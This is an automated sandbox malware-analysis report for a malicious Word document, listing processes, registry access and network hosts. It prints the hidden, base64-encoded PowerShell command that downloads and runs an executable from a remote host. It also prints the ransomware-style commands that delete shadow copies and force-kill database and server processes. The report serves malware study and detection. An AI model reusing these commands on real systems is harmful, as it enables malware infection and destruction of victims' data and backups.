VMRay Analyzer Report for Sample #19692 VMRay Analyzer 2.2.0 URI w-szczecin.pl Resolved_To Address 91.231.140.161 URI v4.ident.me Resolved_To Address 176.58.123.25 URI beer-ranking.pl Resolved_To Address 82.221.129.19 Process 1 2260 winword.exe 1124 winword.exe "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" C:\Users\kFT6uTQW\Desktop\ c:\program files (x86)\microsoft office\office12\winword.exe Child_Of Process 2 2496 mshta.exe 2260 mshta.exe C:\Programs\Microsoft\Office\MSword.exe\..\..\..\..\windows\system32\mshta.exe http://w-szczecin.pl/img2/NEW15_10.doc/index.hta C:\Users\kFT6uTQW\Desktop\ c:\windows\system32\mshta.exe Child_Of Child_Of Created Opened Opened Opened Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Process 3 940 svchost.exe 452 svchost.exe C:\Windows\system32\svchost.exe -k LocalService C:\Windows\system32\ c:\windows\system32\svchost.exe Process 4 2600 cmd.exe 2496 cmd.exe "C:\Windows\system32\cmd.exe" "/c powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA " C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\cmd.exe Child_Of Created Opened Opened Opened Opened Opened Process 5 2624 powershell.exe 2600 powershell.exe powershell.exe -ExeCUtIonPolIcY bypass -WINdowSTYLE hiddEn -ENCodedcOMMANd UABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAG0AaQBuAGkAbQBpAHoAZQBkACAALQBjAG8AbQBtAGEAbgBkACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwB3AC0AcwB6AGMAegBlAGMAaQBuAC4AcABsAC8AaQBtAGcAMgAvAHMANQAwAC4AZQB4AGUAJwAsAB0gJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABuAHYAcwBzAC4AZQB4AGUAHSApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAHSAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAG4AdgBzAHMALgBlAHgAZQAdICkA " C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Child_Of Child_Of Created Created Created Created Created Created Created Created Created Created Created Created Created Created Created Opened Created Created Created Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Process 6 2668 powershell.exe 2624 powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle minimized -command C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\windowspowershell\v1.0\powershell.exe Created Opened Opened Opened Opened Opened Opened Process 7 2704 nvss.exe 2624 nvss.exe "C:\Users\kFT6uTQW\AppData\Roaming\nvss.exe" C:\Users\kFT6uTQW\Desktop\ c:\users\kft6utqw\appdata\roaming\nvss.exe Child_Of Child_Of Child_Of Created Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Wrote_To Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Read_From Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Deleted Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Opened Connected_To Connected_To Connected_To Connected_To Connected_To Connected_To Process 8 2772 cmd.exe 2704 cmd.exe "C:\Windows\System32\cmd.exe" vssadmin.exe Delete Shadows /All /Quiet C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\cmd.exe Wrote_To Opened Opened Opened Opened Process 9 808 svchost.exe 452 svchost.exe C:\Windows\system32\svchost.exe -k netsvcs C:\Windows\system32\ c:\windows\system32\svchost.exe Child_Of Process 10 2992 cmd.exe 2704 cmd.exe cmd /c ""C:\Users\kFT6uTQW\AppData\Roaminghhfhqi2h.wln.bat"" C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\cmd.exe Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Child_Of Created Created Opened Opened Opened Opened Opened Process 11 3012 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM ApacheMonitor.exe /IM ApacheMonitor.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 12 3052 wmiprvse.exe 588 wmiprvse.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding C:\Windows\system32\ c:\windows\system32\wbem\wmiprvse.exe Process 13 1640 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM armsvc.exe /IM armsvc.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 14 2104 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM BackOffice.exe /IM BackOffice.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 15 2288 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM CodeMeter.exe /IM CodeMeter.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 16 2376 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM fbserver.exe /IM fbserver.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 17 2092 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM fdhost.exe /IM fdhost.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 18 2172 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM fdlauncher.exe /IM fdlauncher.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 19 2228 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM GLDS.exe /IM GLDS.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 20 2108 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM grym.exe /IM grym.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 21 276 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM httpd.exe /IM httpd.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 22 328 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM igfxCUIService.exe /IM igfxCUIService.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 23 264 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM iikoNet.Pos.WinService.exe /IM iikoNet.Pos.WinService.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 24 2476 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM mdm.exe /IM mdm.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 25 2572 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM MsDtsSrvr.exe /IM MsDtsSrvr.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 26 2584 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM msmdsrv.exe /IM msmdsrv.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 27 364 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM MSSQLSERVER.exe /IM MSSQLSERVER.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 28 252 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM oktell.ClientStarter4.exe /IM oktell.ClientStarter4.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 29 1412 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM oktell.HALMixerApp.exe /IM oktell.HALMixerApp.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 30 2596 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM OSPPSVC.exe /IM OSPPSVC.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 31 2680 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM PresentationFontCache.exe /IM PresentationFontCache.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 32 2716 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM SQL Server.exe /IM SQL Server.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 33 2628 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM SQLAGENT.exe /IM SQLAGENT.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 34 2700 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM sqlbrowser.exe /IM sqlbrowser.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 35 2616 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM sqlservr.exe /IM sqlservr.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 36 1540 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM sqlwriter.exe /IM sqlwriter.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 37 1968 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM srvany.exe /IM srvany.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 38 3032 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM tomcat7.exe /IM tomcat7.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 39 1564 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM tomcat7_x64.exe /IM tomcat7_x64.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 40 2276 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM torgsoft.exe /IM torgsoft.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 41 2268 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM TSAppServer.exe /IM TSAppServer.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 42 2288 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM p2.exe /IM p2.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 43 2092 taskkill.exe 2992 taskkill.exe TASKKILL /F /IM taskmgr.exe /IM taskmgr.exe C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\taskkill.exe Process 44 2172 vssadmin.exe 2992 vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet C:\Users\kFT6uTQW\Desktop\ c:\windows\syswow64\vssadmin.exe File STD_INPUT_HANDLE File STD_OUTPUT_HANDLE File STD_ERROR_HANDLE Mutex Local\!PrivacIE!SharedMemory!Mutex WinRegistryKey clsid\{25336920-03f9-11cf-8fd0-00aa00686f13}\InProcServer32 HKEY_CLASSES_ROOT WinRegistryKey Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_DATA_RESPECTS_XSS_ZONE_SETTING_KB912120 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_EXTERNAL_STYLE_SHEET_FIX_FOR_SMARTNAVIGATION_KB926131 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ARIA_SUPPORT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_DISPPARAMS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_PRIVATE_FONT_SETTING HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CSS_SHOW_HIDE_EVENTS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DISPLAY_NODE_ADVISE_KB833311 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_EXPANDURI_BYPASS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BODY_SIZE_IN_EDITABLE_IFRAME_KB943245 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DATABINDING_SUPPORT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENFORCE_BSTR HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_DYNAMIC_OBJECT_CACHING HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LEGACY_TOSTRING_IN_COMPATVIEW HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ENABLE_OM_SCREEN_ORIGIN_DISPLAY_PIXELS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_RESTRICT_CRASH_RECOVERY_SAVE_KB978454 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_CLEANUP_AT_FLS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MANAGE_SCRIPT_CIRCULAR_REFS HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_DOCUMENT_COMPATIBLE_MODE HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_WEBOC_DOCUMENT_ZOOM HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\PageSetup HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_XSSFILTER HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_SHOW_FAILED_CONNECT_CONTENT_KB942615 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MSHTML_AUTOLOAD_IEFRAME HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_MIME_TREAT_IMAGE_AS_AUTHORITATIVE HKEY_LOCAL_MACHINE WinRegistryKey SOFTWARE\Microsoft\Windows Script\Features HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\COM3 HKEY_LOCAL_MACHINE COM+Enabled WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ACTIVEX_INACTIVATE_MODE_REMOVAL_REVERT HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\Windows\CurrentVersion\Policies\Explorer HKEY_CURRENT_USER NoFileMenu WinRegistryKey Software\Microsoft\Internet Explorer\PageSetup HKEY_CURRENT_USER Print_Background File STD_OUTPUT_HANDLE File STD_INPUT_HANDLE WinRegistryKey Software\Policies\Microsoft\Windows\System HKEY_CURRENT_USER WinRegistryKey Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun WinRegistryKey Software\Microsoft\Command Processor HKEY_CURRENT_USER DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun DisableUNCCheck EnableExtensions DelayedExpansion DefaultColor CompletionChar PathCompletionChar AutoRun File conout$ File windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\getevent.types.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\types.ps1xml windows\syswow64\windowspowershell\v1.0\types.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\types.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml windows\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\diagnostics.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\wsman.format.ps1xml windows\syswow64\windowspowershell\v1.0\wsman.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\wsman.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\certificate.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\dotnettypes.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\filesystem.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\help.format.ps1xml windows\syswow64\windowspowershell\v1.0\help.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\help.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml windows\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\powershellcore.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml windows\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\powershelltrace.format.ps1xml ps1xml File windows\syswow64\windowspowershell\v1.0\registry.format.ps1xml windows\syswow64\windowspowershell\v1.0\registry.format.ps1xml c:\ c:\windows\syswow64\windowspowershell\v1.0\registry.format.ps1xml ps1xml File windows\microsoft.net\framework\v2.0.50727\config\machine.config windows\microsoft.net\framework\v2.0.50727\config\machine.config c:\ c:\windows\microsoft.net\framework\v2.0.50727\config\machine.config config File users\kft6utqw\appdata\roaming\nvss.exe users\kft6utqw\appdata\roaming\nvss.exe c:\ c:\users\kft6utqw\appdata\roaming\nvss.exe exe MD5 36040c85f7aa54e66fd6ed5e7bf298dd SHA1 55b6e9b15003770842395be3e0d55ac477537ddd SHA256 aac8a8f087e8acfa9acd6e40ca4ee5b5c42f82e4e4f4633268b0bb91cf76de1d File STD_INPUT_HANDLE Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking Mutex Global\.net clr networking WinRegistryKey Software\Microsoft\PowerShell HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1 HKEY_LOCAL_MACHINE WinRegistryKey Software\Microsoft\PowerShell\1\PowerShellEngine HKEY_LOCAL_MACHINE ApplicationBase ApplicationBase WinRegistryKey System\CurrentControlSet\Control\Session Manager\Environment HKEY_LOCAL_MACHINE PSMODULEPATH PSMODULEPATH WinRegistryKey Environment 